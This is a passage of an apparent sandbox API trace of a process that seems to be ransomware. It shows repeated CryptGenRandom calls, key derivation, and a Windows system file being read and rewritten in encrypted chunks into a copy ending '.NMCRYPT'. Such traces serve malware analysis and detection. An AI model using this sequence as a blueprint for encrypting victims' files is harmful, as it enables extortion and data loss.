dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.541] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.542] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.542] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.542] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.542] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.542] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.542] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.542] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.542] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.542] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.542] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.542] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.542] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.542] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.542] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.542] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.542] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.542] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.542] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.542] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.542] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.542] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.542] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.542] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.542] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.542] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.542] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.542] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.542] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.542] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.542] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.542] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.542] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.542] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.542] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.542] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.542] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.542] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.542] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.542] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.542] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.542] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.542] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0154.543] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0154.543] CryptCreateHash (in: hProv=0x8e3a18, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444914 | out: phHash=0x1d444914) returned 1 [0154.543] CryptHashData (hHash=0x9ad338, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0154.543] CryptDeriveKey (in: hProv=0x8e3a18, Algid=0x6610, hBaseData=0x9ad338, dwFlags=0x4, phKey=0x1d444918 | out: phKey=0x1d444918*=0x9ad5f8) returned 1 [0154.543] CryptSetKeyParam (hKey=0x9ad5f8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0154.543] CryptSetKeyParam (hKey=0x9ad5f8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0154.543] wcslen (_String="\\\\?\\") returned 0x4 [0154.543] CryptDuplicateKey (in: hKey=0x9ad5f8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e174 | out: phKey=0x2d7e174*=0x9ad738) returned 1 [0154.543] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE\\tipresx.dll.mui.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\et-ee\\tipresx.dll.mui.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0154.544] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\et-ee\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0154.544] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e164 | out: lpFileSize=0x2d7e164*=8704) returned 1 [0154.544] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e15c*=0x200, lpOverlapped=0x0) returned 1 [0154.544] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.546] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.546] GetLastError () returned 0x0 [0154.546] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.547] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.547] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.547] GetLastError () returned 0x0 [0154.547] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.547] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.547] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.547] GetLastError () returned 0x0 [0154.548] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.548] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.548] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.548] GetLastError () returned 0x0 [0154.548] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.548] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.548] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.548] GetLastError () returned 0x0 [0154.548] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.548] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.548] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.548] GetLastError () returned 0x0 [0154.548] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.548] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.548] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.548] GetLastError () returned 0x0 [0154.548] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0154.548] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0154.548] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0154.548] GetLastError () returned 0x0 [0154.548] WriteFile (in: hFile=0x588, 